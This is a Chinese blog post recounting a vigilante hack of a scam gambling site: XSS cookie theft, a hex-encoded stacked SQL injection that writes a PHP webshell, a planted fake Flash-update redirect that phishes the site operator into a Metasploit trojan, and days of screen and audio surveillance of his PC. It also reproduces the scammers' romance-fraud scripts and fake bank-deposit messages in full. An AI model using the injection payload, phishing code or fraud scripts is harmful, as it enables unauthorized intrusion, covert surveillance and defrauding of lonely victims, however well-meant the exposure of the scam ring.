附美女录音 - 从网站入侵到服务器再到窃听个人PC电脑

2019-07-14 09:19:39 125 5886 12

接到某个朋友电话,叫帮忙查查一个赌博APP,于是牵扯出来了这波戏,过程中多数打码,只为给各位了解一下整个杀猪盘的运行流程,以及其产业链的供需关系情况。



看官不要以为这篇文章就只是个简单的XSS,本公众号从来不发垃圾文章!记得看完额~~



拿下的后台

拿到后台的方式比较简单,就通过传统的XSS大法,这里也就没啥可研究性,就一笔带过。





通过在提款处插入XSS获取到了后台Cookie

然后替换Cookie





这个BC站应该是用的一套cms搭建而来。各位可以看一下他们的前台:



个人中心



是不是非常熟悉的界面。哈哈。



获取到的Webshell

在后台没有上传,很苦恼,于是乎准备撞撞运气,然后我就四处找注入点,万一tm是个root权限呢?

果不其然。确确实找到了一个。



但是他的报错信息是在报文中,无法使用SQLMAP去跑。只能手工。



于是乎叫来了酒馆师傅来看看这个点,搞了2个多小时

最后利用多语句搞定了Webshell



/time/updateTime/72/8308;set%20@x=0x73656c65637420273c3f7068702061737365727428245f504f53545b615d293b706870696e666f28293b2720696e746f206f757466696c652027443a2f77616d702f7765622f64656d6f61612f7765622f342e706870273b;prepare%20a%20from%20@x;execute%20a;select%20sleep(5);



但是拿下shell 拿下服务器就行了? No!要弄点新鲜玩意儿,才能给各位看官带来新一轮的感受。

最后我们审计了该套CMS,最终发现了前台SQL注入,以及直接getshell的Exp。



管理员PC电脑

在获取到了Webshell之后,首先就是分析这台服务器谁在负责?诈骗团伙的历史登陆轨迹?

经过分析:后台登陆日志(数据库)+ Apache访问日志 + 服务器登陆日志 得到了以下结论:



一:诈骗人员 常登陆在马来西亚 与 越南 两地.
二:服务器安装是重庆一个人安装.
三:代码维护网站日常更新是由江苏盐城负责.



服务器登陆日志

2019/6/30 22:18        Administrator        WIN-H5OH8OVBIHT        10        User32         WIN-H5OH8OVBIHT        C:\Windows\System32\winlogon.exe        114.236.**.***
2019/6/30 12:27        Administrator        WIN-H5OH8OVBIHT        10        User32         WIN-H5OH8OVBIHT        C:\Windows\System32\winlogon.exe        114.236.***.**
2019/6/30 12:26        Administrator        WIN-H5OH8OVBIHT        10        User32         WIN-H5OH8OVBIHT        C:\Windows\System32\winlogon.exe        114.***.***.**
2019/6/23 22:40        Administrator        WIN-H5OH8OVBIHT        10        User32         WIN-H5OH8OVBIHT        C:\Windows\System32\winlogon.exe        114.***.***.**
2019/6/20 21:29        Administrator        WIN-H5OH8OVBIHT        10        User32         WIN-H5OH8OVBIHT        C:\Windows\System32\winlogon.exe        114.***.***.**
2019/6/18 22:40        Administrator        WIN-H5OH8OVBIHT        10        User32         WIN-H5OH8OVBIHT        C:\Windows\System32\winlogon.exe        114.***.***.**
2019/6/18 21:18        Administrator        WIN-H5OH8OVBIHT        10        User32         WIN-H5OH8OVBIHT        C:\Windows\System32\winlogon.exe        114.***.***.**
2019/6/13 12:52        Administrator        WIN-H5OH8OVBIHT        10        User32         WIN-H5OH8OVBIHT        C:\Windows\System32\winlogon.exe        223.***.***.**
2019/6/13 0:33        Administrator        WIN-H5OH8OVBIHT        10        User32         WIN-H5OH8OVBIHT        C:\Windows\System32\winlogon.exe        223.***.***.**
2019/6/13 0:25        Administrator        WIN-H5OH8OVBIHT        10        User32         WIN-H5OH8OVBIHT        C:\Windows\System32\winlogon.exe        223.***.***.**
2019/6/12 23:14        Administrator        WIN-H5OH8OVBIHT        10        User32         WIN-H5OH8OVBIHT        C:\Windows\System32\winlogon.exe        103.***.***.**

后台登陆操作日志



于是乎开始了我的钓鱼大计。

钓鱼计划

在我写这篇文章的时候去网站服务器查看远程屏幕,发现了还有另外一个人在负责服务器的维护操作。





幸好老子昨晚把木马全部删除了。



于是乎我准备在看看是谁在负责对这个平台的代码维护以确定最终人。



执行了

netstat -ano | find "36800"

查看当前连接到36800远程端口的IP地址

TCP 123.108.**.**:36800 114.236.**.***:53158 ESTABLISHED 1652

是一个盐城的人在负责运维。这个人的技术能力也就一般菜鸡水平,-.- !!



进入正题

通过在后台入口植入我们的代码

if(empty($_COOKIE['flash'])){        echo '<script>alert("你当前计算机的Flash软件已经很久未更新,将导致无法正常显示界面内容,请下载安装最新版本!");window.location="http://www.flash.cn.xx.com/"</script>';        setcookie("flash","true",time()+30*2400);}

这里就不说代码的意思了。学过的都懂。当对方打开后台会提示:



你当前计算机的Flash软件已经很久未更新,将导致无法正常显示界面内容,请下载安装最新版本!

然后跳转我们的Flash的钓鱼页面。





接着等鱼儿上钩。

然后睡到了10点钟。我的msf果然就有鱼儿上钩了。哈哈哈。

番外篇 - msf的配置

  • msf的木马要免杀
  • 骗子用了麦咖啡+360主动防御
  • msf一定要设置为(本屌吃过亏,上了钩鱼儿跑了。!!!) :https://www.hackdoor.org/d/187
以为这样就完了?

先看看骗子的话术,了解了解,学习学习。



话术一号:




(上班时间 9:30-12:00 午班14:30-18:00) 早上8:00起床打招呼,中午12点打招呼吃饭,午休-14点打招呼上班,下班18点下班打招呼吃饭,19点到家减少或游泳一个小时,20点回家洗澡。按照客户时间视频聊天控制时间。正常00点休息。

            为什么是南方口音?

我从小在深圳长大,已经习惯这边的方言,并没有刻意去改变。

            你平常有什么兴趣爱好?

我平时喜欢晨跑,烹饪,旅游,唱k,偶尔周末的时候还会到健身 俱乐部进行攀岩锻炼。

            你的择偶标准是什么?

我觉得两个人在一起,应该要有共同语言和共同话题,能够相互尊重,包容和理解,相互扶持,同舟共济,平时要多注意沟通交流,知道对方想要什么,最重要还得有孝心

            我们两个人的年龄不合适?

其实真正喜欢一个人,是能把她装在心里面,而不是看她年不年轻,漂不漂亮,关键是这个人能给予其他人给予不了你的这种感觉
            你介意我身边带个孩子吗?
            
这个我完全可以接受,我会把你的孩子当成自己亲生的一样来对待,视如己出

            父母亲为什么离婚?

应该说是父亲犯错吧,我们当时生活还可以,父亲在当地有三家汽车零配件店,在当今这个社会轻松的生活总是让人浮想联翩。我12岁那年,母亲现父亲在外面有了个小家庭,孩子都已经5岁了,我妈妈毅然而然选择跟父亲离婚,我跟着我妈妈过。

            父母亲如何认识?

我父亲是--本地的,从事汽车零配件生意,之前在深圳这边有业务往来,经朋友介绍认识我母亲,最终走到一起的

            你到香港生活工作了几年?

我是2005年毕业于广东韩山师范学院,毕业后在--工作几年,由于业绩突出,被公司总部领导看重,于2012年初调到香港总部工作至今已经六年多

             你离婚多久?

我是2009年底结婚,2014年初离婚,离婚后第二年又谈了个女朋友,相处半年,因为性格不合分手到目前为止已经两年多

             为什么没带母亲一起在香港生活?

前两年有带母亲在香港生活几个月,但母亲觉得香港的生活节奏太快,不适宜养老,那时正是我事业的冲锋期,母亲担心害怕给我的生活和工作带来压力,所以才选择回老家一个人独自生活的

             为什么没带前妻到香港去工作生活?

我前妻是深圳本地的,是个公务员,我之前有劝说过她放弃内陆的工作到香港这边一起生活,但是她热爱自己的公益事业,坚持不肯妥协,毕竟每个人的人生价值追求不一样嘛

             你从事什么工作?

我目前在香港从事游戏软件开发和后台维护管理,现在正在办理工作交接和房子转让手续,拟订下个月15号回xxx长期定居发展。
              回去后准备做什么?

准备开间属于自己的梦想工作室,毕竟自己在计算机这方面已经工作这么多年,比较轻松熟路,再加上这几年也积累了一定的长期客户资源

             你是因为什么离婚?

我是由于长期两地分居造成感情淡化,最终宣告婚姻失败的。

              为什么到现在有孩子?

我当时的生活重心主要放在打拼事业上,也是为了给家庭创造一个好的物质条件生活,但是事与愿违,所以离婚后孩子跟她。

              为什么回老家发展?

所谓父母在不远游,母亲现在已经60多岁,自己在外面也漂泊这么多年,事业也算小有所成,是时候回去照顾母亲的晚年生活,给予精神寄托。

              摄像头掉水里

我每天几乎去游泳或者健身,(前几天)游泳时候手机不小心掉进水里,现在拍出来都是不清不楚,更别谈什么视频了,根本看不了。因为我这手机是国外商务版工作手机诺基亚E90,摄像头配件需要从国外调取,现在在找配件呢。

              为什么不换个手机呢?

因为我是做计算机互联网行业的,我现在用的是国外商务版工作手机,里面刻录了好多工作数据,工作机密,换个手机里面的数据就会被清理掉。我已经要离职了,等这边工作全部交接完成了,旧手机公司就会回收,到时候再换部新的。

             待遇那么好,为什么要回来

所谓的父母在不远游,母亲也60多岁了,我出来这么多年,也该回去了。另外,接下来我想要的婚姻,一定不能再是异地分居,不然不会长久的。


             为什么很少发朋友圈

1.以前都是用这边软件都是用Facebook,最近才用微信。所以微信没怎么发朋友圈。

2.没离婚之前,我还是经常发朋友圈的,我喜欢记录生活的点点滴滴。自从离婚以后,我就重新换了个微信,因为我觉得既然放手了就要断得彻彻底底,这样对双方都好。离婚后我很少发圈很少拍照,感觉没意思,很落寞的样子。现在微信对我来说就只是一个联系方式而已。

              工资待遇方面

主要有三个方面的收入。第一,就是工资(月薪50000多马币-林吉特)第二,外面接单。比如有的客户系统错乱,需要维护系统,需要编程,都可以私下找我们。有时候外面接个单,帮客户写个编程,都能拿好几千块钱的辛苦费。不过,现在比较少接外单了,很累,写个编程就要好几个小时。第三,灰色收入。所谓的灰色收入就相当是医院里的医生收取红包一样。这个到时候在一起了,再慢慢告诉你,你没接触过我们这个行业,现在告诉你,你也不懂。

             工作内容

我们是计算机互联网行业。主要做的是网络编程,软件研发,后台管理,系统维护。简单的说,比如淘宝网,唯品会,阿里巴巴等大型网站都是需要非常专业的团队给他们的后台进行维护,管理,我们就是做这个的。

因为我是做计算机互联网行业的,我现在用的是国外商务版工作手机,里面刻录了好多工作数据,工作机密,换个手机里面的数据就会被清理掉。

我已经要离职了,等这边工作全部交接完成了,旧手机公司就会回收,到时候再换部新的。

两个人在一起一定要懂得包容,懂得呵护,懂得理解尊重,这样咱们的爱情才能保持到永久的新鲜

我们两个人在一起,我会陪你到我们老去的终止的那一天,这样就幸福了老婆

这个是很正常的,相信我们彼此用心了解对方以后,这个迷会是我们美好的开始,不是都说了吗?朦朦胧胧的爱情才唯美。接下来就让我们用真心慢慢了解彼此

为什么现在那么多网恋会成功呢,其实就建立在朦胧的这种基础上,朦朦胧胧的感情,才会使人更加好奇,好奇心人皆有之。正是这种好奇的驱使,往往带来很多种美好的爱情

过去那一页已经翻过去了,接下来我们要面对的是我们的未来,我相信我们会过的很开心,很快乐的

这不关乎于平台问题。计算机互联网行业,是不限制于地域性发展的。一台电脑就是一世界。主要是靠团队的力量。

没错,其实,两口子过日子很简单,好言一句三冬暖,恶语伤人六月寒。两口子在一起最主要学会包容,爱一个人就要爱屋及乌,爱一个人的缺点就是包容,爱一个人的优点就是分享

有的人说离婚后再找对象,只想找个老来伴。但是我不这么认为,我要的婚姻一定要有爱情基础

离过婚的人都会比较懂得珍惜。只要都肯共同努力。其实美好的爱情就在眼前。

那就要看个人的心态了。爱情是一巴掌拍不响的。既然这边有人伸出双手,你肯定也要搭一把手呀。这样不就是更容易水到渠成了吗?

是的。这也是我希望的。我希望咱俩多抽出点时间,时间是衡量一段感情的标准。接下来我们要多接触,互相了解,拉近咱俩彼此的距离

来者要惜,去者要放。人生是一场旅行,不是所有人都会去同一个地方。路途的邂逅,总是美丽,分手的驿站,总是凄凉。不管喜与愁,该走的还是要走,该来的终究会来。人生的旅程,大半是孤单。懂得珍惜,来的俱是美丽;舍得放手,走的不成负担。对过去,要放;对现在,要惜;对将来,要信。要坚强相信咱俩的未来,我真心希望那一个就是你。

嗯嗯。我懂的,万事贵在沟通。所有问题说白,说开了,就不成问题了。婚姻就应该像一张透明的纸。彼此双方看得清清楚楚,明明白白。

你自己都说了专一。我就喜欢专一的,而且还能看出你的真诚,以后一起了,再好好孝顺双方老人家。这样就够了,有孝顺心的孩子最善良

两个人在一起了,就要学会包容呀,爱一个人就要爱屋及乌,我喜欢你的缺点,就是一种包容,你的优点给我带来的就是一种分享。咱俩以后就互相体谅,相敬如宾。毕竟一段婚姻来得也是非常不容易。

眼在天边,近在眼前。只要你肯给我一点小机会,我会感到无尚的荣兴,我会加倍努力,好好珍惜,好好把握。

我说的每句话,每个标点符号都是依心而行,也都是我的心声,既然我们有共同的心声,那咱们就好好努力,不管以后会怎么样?我们都不会遗憾,因为我们努力过

我傻傻的脑袋不灵光,什么都不会,懂的也很少,智商低,情商也不高,就是想找一个不用我操心,让我依靠的人

一个人连自己都看不起自己,谁还会肯定你呢?每个人都有自己专长和欠缺的地方。你可能是在某个自己不擅长没有办法表现,女人的自信男人给的其实高低有什么关系呢,只要自己有喜欢的工作,有疼爱自己的家人,有无话不谈的朋友,每天有可口的饭菜,有开心的笑声,智商和情商低又能怎样遇事多换角度考虑问题,少一些奢求。我相信我能给你依靠,我们一起共度余生


话术二号:



===============研究软件读法====================

亲爱的,今天公司开会决定研究一款新的软件,从晚上开始我跟同事几个人要连续加班做实验好几天,不能像以往那样陪伴你了,希望你理解支持,不忙时我看到你微信留言会第一时间回复你。


这几天回去可能会晚点,如果你累的话就早点休息,回到家后我会给你发信息的,永远爱你[拥抱][拥抱][拥抱]如果软件实验成功了,我会第一时间将这份喜悦与你一起分享[玫瑰][玫瑰][玫瑰]


==============研究软件成功步骤==================


我们研发小程序的,九点的时间帮忙我测试一个新程序,测试的步骤很简单,而且还能有收益,一般外人得不到这样的机会。

稍等我会把我在该平台注册的账号和密码发给你,你晚上九点的时间帮忙登陆下这个账号,帮忙操作一下可以吗?[愉快]

这个操作很简单,等下我会把整个操作的流程图截图发给你,手把手地教你操作一次,一分钟你就懂啦。

我们这款软件主要是针对云顶娱乐城这个网站,通过技术和经验渗入其网站后台操控更改掉它的赔率,从中赚取差价。

(比如现在单双的赔率为1.993,通过技术渗入后台操控更改变为2.05后,单双同时下注,从中就可以赚取5%的收益)


我们同事私底下都叫他们家人来帮忙赚点零花钱,大家心里面都非常清楚,只是不想在桌面上说而已。

你只要帮我下注操作就可以,至于下注的资金由我来出,等下我会往账户转20万进去,到时候你只要按我教你的步骤来操作就可以。这样的机会实在难得,错过这次的机会很难再有下次。亲爱的,我希望你能知道我的出发点是为了我们的未来着想,能让你过上更幸福安逸的日子。

其实我跟同事都私自注册一个账号,都投入几百万在里面了。前两年也有遇到过一次类似的情况,当时我们一心只想着帮公司多挣钱,却不懂得自己注册一个账号跟着公司一起下注赚钱。今年刚好遇到机会,我想自己也注册个账号让母亲帮忙下注,不过母亲说今年眼睛不好使,老眼昏花,怕给我下错注,现在我已经把你当成自己的家人,最信任的人,所以才找你帮这个忙下注,至于下注资金由我来出资。我们这个技术是通过很多人力和精力换来的,机会很难得,我就是不想浪费掉自己的研究成果,这可是我们好几天的心血,说白了就是不想错过挣钱的机会。



问(为什么不自己下注呢?)

答:那时候我跟同事要同步操作电子设备,又加上手机不可以带入操作室避免手机信号干扰设备,从而影响操作效果,所以每个人手机必须放在操作室外面。

问(这是赌博吗?)

答:这个绝对不是赌博,是通过我们的技术和经验渗入博彩网站后台操控更改其赔率,从中赚差价的。赌博是有输有赢的,而我们靠技术做到的是稳赚不赔。(如现在单双赔率1.993改为2.05后,我们从中就能赚取5%的收益)

问(操作这个违法吗?)

答:这个虽然是违规,但绝不违法,违法的是赌博网站,他们是把自己的幸福建立在别人的痛苦之上,别人辛苦一辈子赚来的钱转眼间就掉进他们的口袋里,而我们顶多是靠技术赚点差价而已。

问(这个漏洞的机会能持续多久?)

答:这个机会到底能持续多长时间目前不好确定,可能三四天,又或者十天半个月,甚至更长时间,所以珍惜眼前机会才是正道。

亲爱的,我打算放10万在里面,你只需要帮我单双各下5万,开一次我们就稳赚2500,今天有四次开奖机会,你可以帮我赚1万,这样的机会实在太难得,再也不能错失良机咯。你看以后我们要买房子,教育孩子,我们的养老处处都需要钱,我也是为了我们的小家庭着想,把握住这次的机会,以后我们就轻松很多

网站IP被人查到了,开发的账号已经被封掉,不能再提现。为了安全起见,近期内不要登录网站,唯恐您的账号也被查到。两人的聊天记录删除,微信好友也删除了,等会我用电话联系你的


=======================银行收款短信==================

您尾号3567卡5月30日12:40工商银行收入(他行汇入)200,000.00元,余额322,632.30元。【工商银行】

------------------------------------------------------------
因业务往来需要,请汇款到公司该账户,账户信息如下:
企业名称:
户名:
账号:
开户行:
支付成功后,联系我们在线客服,告知支付方式以及金额。进行资金管理,存款进行提交自动核实添加。
===================================================

【存款提醒】 1.手机银行转账公司财务银行到账,在提交核实添加成功,才可以正常下注。2.微信-收付款-转账到银行卡-填好财务银行-选择2小时到账,付款成功。截图联系在线客服查询,在进行添加金额在您账上。

即日起使用银行账户充值的用户,充值金额为一万,反水1%,另赠送彩金188,充值金额为两万,反水1%,另赠送彩金388,充金额为五万,反水1%,另赠送彩金888,充值金额为十万,反水1%,另赠送彩金1888,充值金额为二十万,反水1%,另赠送彩金3888,充值金额为五十万,反水1%,另赠送彩金8888,充值金额为一百万,反水1%,另赠送彩金28888,彩票投注大厅是国内最大的网上彩票投注站之一,提供便捷的彩票购买、分析、等服务,方便您经松网上买彩票!云顶彩票提供时时彩,六合彩,北京单场竞彩足球,赛车PK10,世界杯冠车竞猜等彩种的代购,合买,开奖,资讯等服务,投入梦想,注定精彩!


经过长达5天的屏幕监视,以及从电脑的桌面获取大量的资料,我们现在开始来逐步分析这个团伙的诈骗步骤,与诈骗的分工模式。



诈骗方法

首先该团伙专门针对单身女性以通过交友名义跟你接触,然后主要活跃在各大交友社区,例如:花田,一半,珍爱,佳缘等等各位平台,通过广撒网的方式进行钓鱼操作,在与单身女性交友后开始以自己研究软件目的希望对方能帮忙测验,也就是我们上面的话术2号,来让受害者到他们指定的假博彩平台进行注册账户,接着通过叫后台人员篡改数据,让受害者以为自己赢了钱,前期通过小利模式获得受害者信任。



以上就是简述的诈骗的过程,这个过程就是我们所谓的 “杀猪盘” 就是受害者被骗子骗了,还叫受害者是猪那种。



首先来介绍一下 在交友网站的账户是如何而来?

卖号人

通过长达5天的监视,以及拖回来的聊天记录分析得出,该团伙主要向2个女性用户购买账户,这些人整个家庭都从事诈骗(夫妻),(不要问我咋知道的,后面会透露) 例如:



  • 购买男性用户花田账户




购买男性用户花田账户





值得搞笑的是,卖号着还会将账户里面的照片进行P图操作,让女孩子或者男的更帅,更好看。以此进行诈骗。







有照片和无照片的价格都是不同的。





花田的实名制也是通过渠道供应





更加搞笑的是还打情骂俏。夫妻都在注册各类账户,然后出售给诈骗人。







8年号码。一看就是大号。跑不了。





吃一波狗粮,继续上路。这只是其中一个售卖账户的。

另外送上一波录音?各位沉浸一下到小姐姐的声音中一下,缓解一下无趣。



https://www.hackdoor.org//assets/files/2019-07-12/1562900907-428371-m4a.m4a



窃听趣事

在长达2天的窃听过程中,发现了对方团伙竟然还跟另外一拨人谈论国内的 “云剑” 行动,还有电影:天下无诈。因为其整个过程中他们说话都好像带着广东话又像是福建话。本屌反正就只听懂了天下无诈。



结尾语

其实整个过程相对于来说并非一番风顺,其中的困难也还是蛮多的,从 前端网站的入侵 到 控制骗子个人PC 再到 窃听团伙动向 再到 了解产业链,整个过程相对来说运气成分也有很大,估摸着也是少数从网站入侵到服务端后新一番的挑战。

关于作者

评论125次

要评论?请先  登录  或  注册